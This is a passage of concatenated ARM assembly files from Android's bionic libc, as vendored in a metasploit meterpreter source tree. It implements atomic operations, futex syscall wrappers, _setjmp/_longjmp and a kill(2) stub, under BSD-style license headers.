__atomic_cmpxchg:
.fnstart
.save {r4, lr}
stmdb sp!, {r4, lr}
mov r4, r0 /* r4 = save oldvalue */
1: @ atomic_cmpxchg
mov r3, #kernel_atomic_base
add lr, pc, #4
mov r0, r4 /* r0 = oldvalue */
add pc, r3, #(kernel_cmpxchg - kernel_atomic_base)
bcs 2f /* swap was made. we're good, return. */
ldr r3, [r2] /* swap not made, see if it's because *ptr!=oldvalue */
cmp r3, r4
beq 1b
2: @ atomic_cmpxchg
ldmia sp!, {r4, lr}
bx lr
.fnend
#else
#define KUSER_CMPXCHG 0xffffffc0
/* Older/unused variants calling the helper through an absolute mov. */
/* r0(old) r1(new) r2(addr) -> r0(zero_if_succeeded) */
__atomic_cmpxchg:
stmdb sp!, {r4, lr}
mov r4, r0 /* r4 = save oldvalue */
1: add lr, pc, #4
mov r0, r4 /* r0 = oldvalue */
mov pc, #KUSER_CMPXCHG
bcs 2f /* swap was made. we're good, return. */
ldr r3, [r2] /* swap not made, see if it's because *ptr!=oldvalue */
cmp r3, r4
beq 1b
2: ldmia sp!, {r4, lr}
bx lr
/* r0(addr) -> r0(old) */
__atomic_dec:
stmdb sp!, {r4, lr}
mov r2, r0 /* address */
1: ldr r0, [r2] /* oldvalue */
add lr, pc, #4
sub r1, r0, #1 /* newvalue = oldvalue - 1 */
mov pc, #KUSER_CMPXCHG
bcc 1b /* no swap, try again until we get it right */
mov r0, ip /* swapped, return the old value */
ldmia sp!, {r4, lr}
bx lr
/* r0(addr) -> r0(old) */
__atomic_inc:
stmdb sp!, {r4, lr}
mov r2, r0 /* address */
1: ldr r0, [r2] /* oldvalue */
add lr, pc, #4
add r1, r0, #1 /* newvalue = oldvalue + 1 */
mov pc, #KUSER_CMPXCHG
bcc 1b /* no swap, try again until we get it right */
mov r0, ip /* swapped, return the old value */
ldmia sp!, {r4, lr}
bx lr
#endif
/* r0(new) r1(addr) -> r0(old) */
/* replaced swp instruction with ldrex/strex for ARMv6 & ARMv7 */
__atomic_swap:
#if defined (_ARM_HAVE_LDREX_STREX)
1: ldrex r2, [r1] @ exclusive load of the old value
strex r3, r0, [r1] @ r3 = 0 on success, 1 if the exclusive was lost
teq r3, #0
bne 1b
mov r0, r2
mcr p15, 0, r0, c7, c10, 5 /* or, use dmb */
#else
swp r0, r0, [r1]
#endif
bx lr
/* __futex_wait(*ftx, val, *timespec) */
/* __futex_wake(*ftx, counter) */
/* __futex_syscall3(*ftx, op, val) */
/* __futex_syscall4(*ftx, op, val, *timespec) */
.global __futex_wait
.type __futex_wait, %function
.global __futex_wake
.type __futex_wake, %function
.global __futex_syscall3
.type __futex_syscall3, %function
.global __futex_syscall4
.type __futex_syscall4, %function
#if __ARM_EABI__
@ Raw futex(2) wrappers: arguments are passed straight through; the
@ wait/wake entry points just insert the FUTEX_* op into r1 first.
__futex_syscall3:
.fnstart
stmdb sp!, {r4, r7}
.save {r4, r7}
ldr r7, =__NR_futex
swi #0
ldmia sp!, {r4, r7}
bx lr
.fnend
__futex_wait:
.fnstart
stmdb sp!, {r4, r7}
.save {r4, r7}
mov r3, r2 @ r3 = timespec
mov r2, r1 @ r2 = expected value
mov r1, #FUTEX_WAIT
ldr r7, =__NR_futex
swi #0
ldmia sp!, {r4, r7}
bx lr
.fnend
__futex_wake:
stmdb sp!, {r4, r7}
mov r2, r1 @ r2 = number of waiters to wake
mov r1, #FUTEX_WAKE
ldr r7, =__NR_futex
swi #0
ldmia sp!, {r4, r7}
bx lr
#else
__futex_syscall3:
swi #__NR_futex
bx lr
__futex_wait:
mov r3, r2
mov r2, r1
mov r1, #FUTEX_WAIT
swi #__NR_futex
bx lr
__futex_wake:
mov r2, r1
mov r1, #FUTEX_WAKE
swi #__NR_futex
bx lr
#endif
__futex_syscall4:
b __futex_syscall3 @ 4th arg is already in r3, same register layout
|
OpenWireSec/metasploit | 3,225 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/_setjmp.S | /* $OpenBSD: _setjmp.S,v 1.2 2004/02/01 05:40:52 drahn Exp $ */
/* $NetBSD: _setjmp.S,v 1.5 2003/04/05 23:08:51 bjh21 Exp $ */
/*
* Copyright (c) 1997 Mark Brinicombe
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by Mark Brinicombe
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- _setjmp, _longjmp
*
* _longjmp(a,v)
* will generate a "return(v)" from the last call to
* _setjmp(a)
* by restoring registers from the stack.
* The previous signal state is NOT restored.
*
* Note: r0 is the return value
* r1-r3 are scratch registers in functions
*/
/*
 * int _setjmp(jmp_buf env)  -- r0 = env
 *
 * Saves the non-volatile machine state into env and returns 0.
 * Buffer layout written here (via post-incremented stores through r0):
 *   [0]      magic word _JB_MAGIC__SETJMP (checked by _longjmp)
 *   [4..55]  FPA registers f4-f7 (sfm) + fpsr (rfs/str) — legacy FPA
 *            coprocessor state, skipped (offset bumped by 52) when
 *            built SOFTFLOAT
 *   [56..]   integer registers r4-r14 (callee-saved regs + sp + lr)
 * Signal mask is deliberately NOT saved (see header comment above).
 */
ENTRY(_setjmp)
ldr r1, .L_setjmp_magic
str r1, [r0], #4 /* stamp the magic word first */
#ifdef SOFTFLOAT
add r0, r0, #52 /* skip the FP slots, keep layout identical */
#else
/* Store fp registers */
sfm f4, 4, [r0], #48 /* FPA: store f4-f7 (4 regs x 12 bytes) */
/* Store fpsr */
rfs r1
str r1, [r0], #0x0004
#endif /* SOFTFLOAT */
/* Store integer registers */
stmia r0, {r4-r14}
mov r0, #0x00000000 /* direct _setjmp call returns 0 */
bx lr
.L_setjmp_magic:
.word _JB_MAGIC__SETJMP
/*
 * void _longjmp(jmp_buf env, int val)  -- r0 = env, r1 = val
 *
 * Restores the state saved by _setjmp(env) and "returns" val from that
 * _setjmp call (val is forced to 1 if the caller passed 0, as the C
 * standard requires).  Validation: the magic word must match, and the
 * restored sp/r14 must be non-zero — any failure funnels into `botch`,
 * which reports via longjmperror() and abort()s.  Restore order mirrors
 * the save order in _setjmp exactly (magic, FPA regs + fpsr unless
 * SOFTFLOAT, then r4-r14).
 */
ENTRY(_longjmp)
ldr r2, .L_setjmp_magic
ldr r3, [r0], #4
teq r2, r3 /* was this buffer written by _setjmp? */
bne botch
#ifdef SOFTFLOAT
add r0, r0, #52 /* skip the FP slots, keep layout identical */
#else
/* Restore fp registers */
lfm f4, 4, [r0], #48 /* FPA: reload f4-f7 */
/* Restore fpsr */
ldr r4, [r0], #0x0004
wfs r4
#endif /* SOFTFLOAT */
/* Restore integer registers */
ldmia r0, {r4-r14}
/* Validate sp and r14 */
teq sp, #0
teqne r14, #0
beq botch
/* Set return value */
mov r0, r1
teq r0, #0x00000000 /* _setjmp must not appear to return 0 again */
moveq r0, #0x00000001
bx lr
/* validation failed, die die die. */
botch:
bl PIC_SYM(_C_LABEL(longjmperror), PLT)
bl PIC_SYM(_C_LABEL(abort), PLT)
b . - 8 /* Cannot get here */
|
OpenWireSec/metasploit | 2,057 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/kill.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* unlike our auto-generated syscall stubs, this code saves lr
on the stack, as well as a few other registers. this makes
our stack unwinder happy, when we generate debug stack
traces after the C library or other parts of the system
abort due to a fatal runtime error (e.g. detection
of a corrupted malloc heap).
*/
#include <sys/linux-syscalls.h>
#ifndef __NR_kill
#define __NR_kill 37
#endif
.text
.type kill, #function
.globl kill
.align 4
/*
 * int kill(pid_t pid, int sig)  -- r0 = pid, r1 = sig
 *
 * Hand-written kill(2) stub.  Unlike the auto-generated syscall stubs,
 * it saves r4-r7, ip and lr on the stack so the in-process stack
 * unwinder can produce a usable trace when kill() is used to abort on
 * a fatal runtime error (see the header comment at the top of this
 * file).  The kernel returns -errno in r0 on failure: `movs r0, r0`
 * sets the N flag for a negative result, `bxpl` returns directly on
 * success, and negative results fall through to __set_syscall_errno
 * to store errno and return -1.
 */
kill:
stmfd sp!, {r4-r7, ip, lr} /* saved for unwinder-friendly traces */
ldr r7, =__NR_kill /* EABI: syscall number in r7 */
swi #0
ldmfd sp!, {r4-r7, ip, lr}
movs r0, r0 /* N flag <- sign of kernel result */
bxpl lr /* result >= 0: success, return it */
b __set_syscall_errno /* result < 0: translate -errno */
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.